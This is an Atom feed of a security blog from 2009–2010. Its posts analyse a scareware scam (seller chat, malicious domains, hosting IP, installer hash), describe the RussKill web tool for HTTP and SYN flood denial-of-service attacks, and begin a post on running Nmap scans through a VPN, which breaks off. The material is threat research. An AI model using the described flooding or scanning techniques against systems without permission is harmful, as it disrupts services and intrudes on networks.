<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6766263746795718144</id><updated>2011-09-26T04:54:53.709-10:00</updated><category term='vulnerabilidades'/><category term='Conditions'/><category term='Process Memory Dumper'/><category term='seguridad'/><category term='PMD'/><category term='oscar awards'/><category term='Jorge Mieres'/><category term='malware'/><category term='Drive-by-Download'/><category term='Fuzzing'/><category term='SWF'/><category term='single-flux'/><category term='Drive-by Update'/><category term='PCAP'/><category term='vulnerabilities'/><category term='Asprox'/><category term='Electronic security'/><category term='scareware'/><category term='zeus'/><category term='Malware Intelligence'/><category term='spam'/><category term='poisonivy'/><category term='oscar_winners'/><category term='Contributing'/><category term='email'/><category term='XP Police Antivirus'/><category term='review'/><category term='NtSetDebugFilterState'/><category term='Volunteering'/><category term='ms09-002'/><category term='fragus'/><category term='PoC'/><category term='russkill'/><category term='attack'/><category term='SecInternals'/><category term='Crimeware'/><category term='CYBINT'/><category term='printable_oscar_ballot2009'/><category term='security'/><category term='double-flux'/><category term='0-day'/><category term='Quad System'/><category term='Submission'/><category term='Linkdin Group'/><category term='Rules'/><category term='waledac'/><category term='ddos'/><category term='vulnerabilities research'/><category term='Phoenix Exploit&apos;s Kit'/><category term='Danmec'/><category term='desinformation'/><category term='ms08-067'/><category term='botnet'/><category term='forensic'/><category term='koobface'/><category term='phishing'/><category term='gumblar'/><category term='device driver'/><category term='oscar_schedule'/><category term='rogue'/><category term='fast-flux'/><category term='virus'/><category term='www.SecInternals.com'/><category term='buffer overflow'/><category term='Reverse Engineering'/><category term='Anti-Dbg Trick'/><category term='malware kit'/><category term='exploit'/><category term='ataques'/><title type='text'>EvilFingers</title><subtitle type='html'>The official blog of &lt;a href="http://www.EvilFingers.com"&gt;EvilFingers&lt;/a&gt; website.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default?start-index=101&amp;max-results=100'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>422</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-1346973989637034166</id><published>2010-01-07T03:11:00.003-11:00</published><updated>2010-01-07T03:15:06.688-11:00</updated><title type='text'>EFBlog Moved Permanently</title><content type='html'>Hello Readers,&lt;br /&gt;&lt;br /&gt;Thank you for your uninterrupted support. We hope that you had a great time during your long weekends and holidays. We are getting back into action with the first step of moving EFBLOG permanently to &lt;b&gt;&lt;a href="http://ef.kaffenews.com"&gt;http://EF.KAFFENEWS.COM&lt;/a&gt;&lt;/b&gt;. Sorry for any inconvenience. Kindly, follow us there. Thank you once again for all your support.&lt;br /&gt;&lt;br /&gt;Kind Regards,&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-1346973989637034166?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/1346973989637034166/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=1346973989637034166' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1346973989637034166'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1346973989637034166'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2010/01/efblog-moved-permanently.html' title='EFBlog Moved Permanently'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-3038744146044617122</id><published>2010-01-05T01:00:00.000-11:00</published><updated>2010-01-05T04:03:26.474-11:00</updated><title type='text'>Crimeware in 2009</title><content type='html'>"&lt;span style="font-weight: bold;"&gt;Crimeware in 2009&lt;/span&gt;" presented in one document all that was channeled through this blog during the year in question on &lt;span style="font-weight: bold;"&gt;crimeware &lt;/span&gt;and associated hazards.&lt;br /&gt;&lt;br /&gt;There are a total of 262 pages and is divided by the most relevant topics that describe the criminal activities that were a source of news on this blog. Has two indices for getting the news in a simple (content) and another on the images (image index).&lt;br /&gt;&lt;br /&gt;Then let some of the themes they found in the document in question:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Current business outlook caused by crimeware&lt;/li&gt;&lt;li&gt;Framework Exploit Pack for botnets general purpose&lt;/li&gt;&lt;li&gt;Framework Exploit Pack for botnets particular purpose&lt;/li&gt;&lt;li&gt;Services associated with crimeware&lt;/li&gt;&lt;li&gt;Intelligence in the fight against crimeware&lt;/li&gt;&lt;li&gt;Campaigns of spread and infection&lt;/li&gt;&lt;li&gt;Other Exploits packs that were investigated&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-weight: bold;"&gt;Short information&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.malwareint.com/"&gt;Malware Intelligence&lt;/a&gt;&lt;br /&gt;Annual compendium of information. Crimeware in 2009&lt;br /&gt;262 pages&lt;br /&gt;Spanish language&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.malwareint.com/docs/MalwareInt-anual-2009.pdf"&gt;&lt;br /&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Jorge Mieres&lt;br /&gt;Malware Intelligence Blog&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-3038744146044617122?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/3038744146044617122/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=3038744146044617122' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/3038744146044617122'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/3038744146044617122'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2010/01/crimeware-in-2009.html' title='Crimeware in 2009'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-8632601710784792266</id><published>2009-12-25T15:43:00.000-11:00</published><updated>2009-12-25T15:44:17.064-11:00</updated><title type='text'>Anti-Virus Live 2010. Talking with the enemy</title><content type='html'>&lt;div style="text-align: justify;"&gt;Generally one has the false belief that malicious code is trivial that any technical problems solved by just formatting the system or acquire any of the known anti-malware market offers today.&lt;br /&gt;&lt;br /&gt;However, on the one hand, the reality is that behind the development of malware hides a very large business in which every day must be added more "associates". Moreover, what happens when we plan to buy this antivirus is just the opposite.&lt;br /&gt;&lt;br /&gt;This is the case of the &lt;span style="font-weight: bold;"&gt;Anti-Virus Live 2010&lt;/span&gt; or what is the same, &lt;span style="font-weight: bold;"&gt;Anti-Virus Elite 2010&lt;/span&gt; malware &lt;a style="color: rgb(51, 51, 255);" href="http://malwareint.blogspot.com/2009/12/recent-tour-of-scareware-xix.html"&gt;scareware&lt;/a&gt; type (or &lt;span style="font-weight: bold;"&gt;rogue&lt;/span&gt;), which makes it quite evident that the processes and mechanisms by which deceives order to steal your money are well oiled and well thought out.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SzL83KVzgWI/AAAAAAAACEA/mwOmbKlY1gc/s1600-h/mipistus-av-live2010.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 271px; height: 400px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SzL83KVzgWI/AAAAAAAACEA/mwOmbKlY1gc/s400/mipistus-av-live2010.png" alt="" id="BLOGGER_PHOTO_ID_5418671326278943074" border="0" /&gt;&lt;/a&gt;At first instance, as is usual in this type of threat, the strategy is supported by a website that is used to "bait" to lure potential victims, saying all sorts of justifications to "prove" some credibility on the false antivirus, which complements a typical &lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/12/campana-de-desinformacion-para-propagar.html"&gt;disinformation campaign&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;So far, nothing interesting. Except for the possibility of requesting assistance via chat. Interesting. Then check if this condiment is legitimate ... Yes it's.&lt;br /&gt;&lt;br /&gt;Consequently, communication was established through this option with the surprise that immediately got response from the other side. You can then take the short conversation via chat.&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SzL9KTjiJCI/AAAAAAAACEI/ccv4zbkWLR0/s1600-h/mipistus-chat.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 385px; height: 400px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SzL9KTjiJCI/AAAAAAAACEI/ccv4zbkWLR0/s400/mipistus-chat.png" alt="" id="BLOGGER_PHOTO_ID_5418671655169958946" border="0" /&gt;&lt;/a&gt;We basically said Dennis, the merchant, which among other things the course antivirus is compatible with all versions of Windows, its value is &lt;span style="font-weight: bold;"&gt;USD 27&lt;/span&gt;, which only supports English and no enterprise version and no problems eliminating &lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/04/conficker-iv-dominios-relacionados-y.html"&gt;conficker&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Let us briefly discuss these points. Obviously, the scareware must be compatible with all versions of Windows as it's this time the audience that the threat is directed. Why? Simply because more than 80% of people use Windows as the main operating system in home environments where the potential for finding a particular victim increases. This way is much more likely "to close business."&lt;br /&gt;&lt;br /&gt;For the same reason there isn't version for GNU/Linux, even, not even version oriented businesses; because usually, the companies have a higher level of security where probably the scareware not find results.&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Why English and not Russian? Because English is the third most popular language. Its cost, &lt;span style="font-weight: bold;"&gt;USD 27&lt;/span&gt;, represents a competitive value that's commensurate with the average cost of legitimate antivirus programs. And regarding conficker, whether by &lt;a style="color: rgb(51, 51, 255);" href="http://malwareint.blogspot.com/2009/06/symbiosis-malware-present-koobface.html"&gt;koobface&lt;/a&gt; wondering, the answer would have been the same.&lt;br /&gt;&lt;br /&gt;A very interesting fact that helps to understand its true magnitude of the illegal business of malware, is the error committed by the "affiliate" Dennis when requesting the URL to buy a false solution. It gives us the url &lt;span style="font-style: italic;"&gt;registryfix.com/purchase&lt;/span&gt; and time of comment that is not in question the supposed solution, offering the proviso &lt;span style="font-style: italic;"&gt;antivirus-elite.com/purchase&lt;/span&gt; the corresponding url.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SzMAAbixsbI/AAAAAAAACEQ/85DiICWTp_s/s1600-h/mipistus-purchase.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 149px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SzMAAbixsbI/AAAAAAAACEQ/85DiICWTp_s/s400/mipistus-purchase.png" alt="" id="BLOGGER_PHOTO_ID_5418674784050459058" border="0" /&gt;&lt;/a&gt;However, we were trying to close "business" by &lt;span style="font-weight: bold;"&gt;Anti-Virus Live 2010&lt;/span&gt; and not  &lt;span style="font-weight: bold;"&gt;Anti-Virus  Elite 2010&lt;/span&gt;, making it clear that this is the same threat under different names. Even the same "partner" manages and markets various alternatives under similar mode. In this case, also offering the fraudulent sale of &lt;span style="font-weight: bold;"&gt;Registry Fix&lt;/span&gt;, another associated with &lt;span style="font-weight: bold;"&gt;NoAdware&lt;/span&gt; and scareware &lt;span style="font-weight: bold;"&gt;ErrorClean&lt;/span&gt;.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SzMAuJjmM8I/AAAAAAAACEY/u_ExXtGG6YI/s1600-h/mipistus-malware-server.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 152px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SzMAuJjmM8I/AAAAAAAACEY/u_ExXtGG6YI/s200/mipistus-malware-server.png" alt="" id="BLOGGER_PHOTO_ID_5418675569496044482" border="0" /&gt;&lt;/a&gt;From a technical point of view, the domain of this threat is in the IP address &lt;span style="font-weight: bold;"&gt;204.232.131.12&lt;/span&gt;, hosted by the &lt;a style="color: rgb(51, 51, 255);" href="http://www.rackspace.com/index.php"&gt;ISP Rackspace&lt;/a&gt;, located in the city of Hoboken in the United States under &lt;span style="font-weight: bold;"&gt;AS27357&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;According to the history of this AS, the activities generated by malicious code are important&lt;br /&gt;&lt;br /&gt;From the website you download an executable named &lt;span style="font-style: italic;"&gt;setup.exe &lt;/span&gt;&lt;span style="font-size:85%;"&gt;(MD5: C50DC619E13345DEC2444B0DE371DFD4)&lt;/span&gt; which corresponds to scareware installer with a &lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/039083f8eaa6a02b7239bb76dae708dbeb41f944a4fdeff6f09d0cfdd023c8c2-1261593825"&gt;low rate of detection&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;As we see, the cybercriminals don't get tired of spreading increasingly aggressive threats that accompany the infection process through marketing campaigns, even very similar to those used by many antivirus companies.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Related information&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://malwareint.blogspot.com/2009/12/recent-tour-of-scareware-xix.html"&gt;A recent tour of scareware XIX&lt;/a&gt;&lt;br /&gt;&lt;a href="http://mipistus.blogspot.com/2009/09/green-it-utilizado-para-la-propagacion_17.html"&gt;Green IT utilizado para la propagación de scarewar...&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/06/scareware-repositorio-de-malware-in.html"&gt;Scareware. Repositorio de malware In-the-Wild&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/05/scareware-estrategia-de-engano.html"&gt;Scareware. Estrategia de engaño propuesta por Personal Antivirus&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/05/campana-de-propagacion-del-scareware.html"&gt;Campaña de propagación del scareware MalwareRemovalBot&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Jorge Mieres&lt;br /&gt;Malware Intelligence Blog&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-8632601710784792266?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/8632601710784792266/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=8632601710784792266' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/8632601710784792266'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/8632601710784792266'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/12/anti-virus-live-2010-talking-with-enemy.html' title='Anti-Virus Live 2010. Talking with the enemy'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_Ppq0fEGkHo4/SzL83KVzgWI/AAAAAAAACEA/mwOmbKlY1gc/s72-c/mipistus-av-live2010.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-6123434705447720317</id><published>2009-12-17T04:12:00.002-11:00</published><updated>2009-12-17T14:03:56.253-11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Jorge Mieres'/><category scheme='http://www.blogger.com/atom/ns#' term='russkill'/><category scheme='http://www.blogger.com/atom/ns#' term='botnet'/><title type='text'>RussKill. Application to perform denial of service attacks</title><content type='html'>&lt;div style="text-align: justify;"&gt;Conceptually speaking, a &lt;span style="font-weight: bold;"&gt;DoS attack&lt;/span&gt; (&lt;span style="font-weight: bold;"&gt;Denial of Service attack&lt;/span&gt;) is basically bombarded with requests for a service or computer resource to saturate and the system can not process more data, so those resources and services are inaccessible, "denying" the access to anyone who wants them.&lt;br /&gt;&lt;br /&gt;From the standpoint of computer security, &lt;span style="font-weight: bold;"&gt;Denial of Service attacks&lt;/span&gt; are a major problem because many &lt;span style="font-weight: bold;"&gt;botnets&lt;/span&gt; are designed to automate these attacks, &lt;a style="color: rgb(51, 51, 255);" href="http://malwareint.blogspot.com/2009/11/ddos-botnet-new-crimeware-particular.html"&gt;especially those of particular purpose&lt;/a&gt;, taking advantage of computational power offered by the network of zombies. In this case, the attack is called &lt;span style="font-weight: bold;"&gt;Distributed Denial of Service&lt;/span&gt; (&lt;span style="font-weight: bold;"&gt;DDoS&lt;/span&gt;).&lt;br /&gt;&lt;br /&gt;Moreover, under the framework of the concept of &lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/09/inteligencia-informatica-seguridad-de.html"&gt;cyberwarfare&lt;/a&gt;, this type of attack is part of the armament "war" through which virtual scenarios presented conflicts between their requirements as to neutralize a state vital services.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;RussKill&lt;/span&gt; is a web application that is classified within these activities and that despite being extremely simple, both in functionality and in the way of use, is an attack that could be very effective and difficult to detect.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Ppq0fEGkHo4/SyrUtMf6WJI/AAAAAAAACDo/XN1z0_GBBjU/s1600-h/mipistus-russkill-log-mark.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 169px;" src="http://3.bp.blogspot.com/_Ppq0fEGkHo4/SyrUtMf6WJI/AAAAAAAACDo/XN1z0_GBBjU/s400/mipistus-russkill-log-mark.png" alt="" id="BLOGGER_PHOTO_ID_5416375374780717202" border="0" /&gt;&lt;/a&gt;As is customary in the current &lt;span style="font-weight: bold;"&gt;crimeware&lt;/span&gt;, the web application is of Russian origin and has a number of fields with information about how and against whom to carry out the attack, letting you configure the packet sequence, ie the flow in amount. The option "&lt;span style="font-style: italic;"&gt;Hide url&lt;/span&gt;" is a self-defensive measure designed to ensure that the server is detected.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Ppq0fEGkHo4/SyrUn3--OWI/AAAAAAAACDg/ahgB6fovDFs/s1600-h/mipistus-russkill-flow-mark.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 142px;" src="http://2.bp.blogspot.com/_Ppq0fEGkHo4/SyrUn3--OWI/AAAAAAAACDg/ahgB6fovDFs/s400/mipistus-russkill-flow-mark.png" alt="" id="BLOGGER_PHOTO_ID_5416375283374504290" border="0" /&gt;&lt;/a&gt;Although several methods of &lt;span style="font-weight: bold;"&gt;DoS attacks&lt;/span&gt;, &lt;span style="font-weight: bold;"&gt;RussKill&lt;/span&gt; makes use of the attacks &lt;span style="font-weight: bold;"&gt;HTTP-flood&lt;/span&gt; and &lt;span style="font-weight: bold;"&gt;SYN-flood&lt;/span&gt;. In both cases the servers for flood victims through http requests and packets with fake source IP addresses respectively.&lt;br /&gt;&lt;br /&gt;As I said at first, the denial of service attacks are a danger for any information system, regardless of the platform that supports services and applications such, in this case site, demonstrates the ease with which an attack of this type can run.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Related information&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://malwareint.blogspot.com/2009/11/ddos-botnet-new-crimeware-particular.html"&gt;DDoS Botnet. New crimeware particular purpose&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Jorge Mieres&lt;br /&gt;Pistus Malware Intelligence&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-6123434705447720317?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/6123434705447720317/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=6123434705447720317' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/6123434705447720317'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/6123434705447720317'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/12/russkill-application-to-perform-denial.html' title='RussKill. Application to perform denial of service attacks'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Ppq0fEGkHo4/SyrUtMf6WJI/AAAAAAAACDo/XN1z0_GBBjU/s72-c/mipistus-russkill-log-mark.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-1219554250805235987</id><published>2009-12-11T00:19:00.002-11:00</published><updated>2009-12-11T00:23:10.859-11:00</updated><title type='text'>Using Nmap Remotely Through F5 FirePass VPN</title><content type='html'>Well, we all use the common hacking tools of the trade like Nmap. Some of us use it on Windows and some on Linux. This post is for the people using it on Windows.&lt;div&gt;I was connected to a network remotely through the company's F5 VPN appliance and I wanted to scan the internal network.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;It looked like:&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt; &lt;/span&gt;Microsoft Windows XP [Version 5.1.2600]&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt; &lt;/span&gt;(C) Copyright 1985-2001 Microsoft Corp.&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt; &lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt; &lt;/span&gt;C:\Documents and Settings\Rafel&gt;nmap -PN -sS -p 445 192.168.1.*&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Once I pressed "Enter" I got:&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-11-10 00:34 Jerusalem Standard&lt;span class="Apple-style-span" style="white-space: pre; "&gt; &lt;span class="Apple-style-span" style="white-space: normal; "&gt;Time&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;WARNING: Using raw sockets because ppp0 is not an ethernet device. This probably won't &lt;/span&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;work on Windows.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The &lt;span class="Apple-style-span" style="white-space: pre; "&gt; &lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;system cannot &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;find the device specified. (20). Will wait 5 seconds then retry.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;span class="Apple-style-span" style="white-space: pre; "&gt; &lt;/span&gt;pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The &lt;span class="Apple-style-span" style="white-space: pre; "&gt; &lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;system cannot &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;find the device specified. (20). Will wait 25 seconds then retry.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; 